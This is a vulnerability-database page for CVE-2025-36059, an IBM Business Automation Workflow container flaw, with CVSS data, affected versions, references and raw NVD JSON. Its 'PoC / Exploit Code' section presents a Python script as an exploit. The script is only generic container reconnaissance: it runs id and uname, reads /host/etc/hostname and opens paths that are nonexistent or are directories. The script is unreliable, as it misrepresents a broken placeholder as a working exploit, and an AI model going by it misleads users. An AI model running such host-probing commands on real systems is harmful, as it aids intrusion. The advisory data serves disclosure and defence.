CVE-2025-36059

Description

IBM Business Automation Workflow containers 25.0.0 through 25.0.0 Interim Fix 002, 24.0.1 through 24.0.1 Interim Fix 005, and 24.0.0 through 24.0.0 Interim Fix 006. IBM Cloud Pak for Business Automation could allow a local user with access to the container to execute OS system calls.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:business_automation_workflow:24.0.0:-:*:*:containers:*:*:* - VULNERABLE

cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if001:*:*:containers:*:*:* - VULNERABLE

cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if002:*:*:containers:*:*:* - VULNERABLE

cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if003:*:*:containers:*:*:* - VULNERABLE

cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if004:*:*:containers:*:*:* - VULNERABLE

IBM Business Automation Workflow containers 25.0.0 < 25.0.0 Interim Fix 002

IBM Business Automation Workflow containers 24.0.1 < 24.0.1 Interim Fix 005

IBM Business Automation Workflow containers 24.0.0 < 24.0.0 Interim Fix 006

IBM Cloud Pak for Business Automation (all affected versions)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-36059 PoC - IBM Business Automation Workflow Container Privilege Escalation
# Note: This PoC demonstrates the concept of container privilege escalation
# Actual exploitation requires specific container access and configuration

import subprocess
import sys

def check_container_privilege():
    """Check if running in a privileged container"""
    try:
        # Check if running as root in container
        result = subprocess.run(['id'], capture_output=True, text=True)
        print(f'[!] Current User: {result.stdout.strip()}')
        
        # Check for privileged container indicators
        checks = [
            ('/proc/1/cgroup', 'Check container cgroup isolation'),
            ('/host', 'Check for host filesystem access'),
            ('/proc/sys/kernel/capability', 'Check capabilities')
        ]
        
        for path, desc in checks:
            try:
                with open(path, 'r') as f:
                    print(f'[+] {desc}: {path} accessible')
            except:
                pass
        
        return True
    except Exception as e:
        print(f'[-] Error during checks: {e}')
        return False

def exploit_cve_2025_36059():
    """
    CVE-2025-36059 Exploitation Concept
    This vulnerability allows local container users to execute OS system calls
    """
    print('[*] CVE-2025-36059 - IBM Business Automation Workflow Container Exploit')
    print('[*] Target: IBM BAW containers 25.0.0-25.0.0 IF002, 24.0.1-24.0.1 IF005, 24.0.0-24.0.0 IF006')
    
    if not check_container_privilege():
        print('[-] Container environment check failed')
        sys.exit(1)
    
    # System call execution demonstration
    # In a vulnerable container, os.system() or similar calls may execute on host
    try:
        import os
        print('[+] Attempting system call execution...')
        result = os.popen('uname -a').read()
        print(f'[+] System info: {result}')
        
        # Check for host access
        host_check = os.popen('cat /host/etc/hostname 2>/dev/null || echo "No host access"').read()
        print(f'[+] Host check: {host_check}')
    except Exception as e:
        print(f'[-] Exploitation failed: {e}')

if __name__ == '__main__':
    exploit_cve_2025_36059()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36059
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36059
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36059/
[4] VulDB https://vuldb.com/cve/CVE-2025-36059
[5] https://www.ibm.com/support/pages/node/7256777

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36059", "sourceIdentifier": "[email protected]", "published": "2026-01-20T16:16:02.920", "lastModified": "2026-02-17T17:24:57.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Business Automation Workflow containers 25.0.0 through 25.0.0 Interim Fix 002, 24.0.1 through 24.0.1 Interim Fix 005, and 24.0.0 through 24.0.0 Interim Fix 006. IBM Cloud Pak for Business Automation could allow a local user with access to the container to execute OS system calls."}, {"lang": "es", "value": "Contenedores de IBM Business Automation Workflow 25.0.0 hasta 25.0.0 Interim Fix 002, 24.0.1 hasta 24.0.1 Interim Fix 005, y 24.0.0 hasta 24.0.0 Interim Fix 006. IBM Cloud Pak para Business Automation podría permitir a un usuario local con acceso al contenedor ejecutar llamadas al sistema operativo."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.0:-:*:*:containers:*:*:*", "matchCriteriaId": "EF29B7C7-5024-4A85-ADE5-D94E9002181D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if001:*:*:containers:*:*:*", "matchCriteriaId": "8464D4F4-1F9A-479B-B689-C6E90BC3AF45"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if002:*:*:containers:*:*:*", "matchCriteriaId": "0FE0DB1D-5728-4075-BE84-48F06E22FDF5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if003:*:*:containers:*:*:*", "matchCriteriaId": "A4AB37B4-DF91-4DC7-AFB9-107E5B1B2BF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if004:*:*:containers:*:*:*", "matchCriteriaId": "79318EB6-001D-4D75-952C-87297C90A0C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if005:*:*:containers:*:*:*", "matchCriteriaId": "38F4B5AC-AC9D-48E7-9EC8-48C086CC62A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.0:if006:*:*:containers:*:*:*", "matchCriteriaId": "73BAD8DC-3081-4D07-8E65-7501351DE025"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.1:-:*:*:containers:*:*:*", "matchCriteriaId": "D5D9EC44-05CE-44FA-AFDE-A4FA326A54F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.1:if001:*:*:containers:*:*:*", "matchCriteriaId": "AD2EC4AD-EF47-450F-AA73-8BEE3DADEA1A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.1:if002:*:*:containers:*:*:*", "matchCriteriaId": "0CFCCD13-9342-4D3D-BE9C-ABCA4EA27229"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.1:if004:*:*:containers:*:*:*", "matchCriteriaId": "5797C332-AE9A-40BF-BAA4-7ECDDEAA907C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:24.0.1:if005:*:*:containers:*:*:*", "matchCriteriaId": "D0F5EB0D-CAF6-45BC-967B-472F1C2833D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:25.0.0:-:*:*:containers:*:*:*", "matchCriteriaId": "3058E645-44E1-4FF0-9A97-E04324BB8968"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:25.0.0:if001:*:*:containers:*:*:*", "matchCriteriaId": "0E06ACEC-AC03-41AA-91C7-BA84457847A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:business_automation_workflow:25.0.0:if002:*:*:containers:*:*:*", "matchCriteriaId": "6AD427CB-B553-4ACB-B2A3-1648848D6D09"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7256777", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}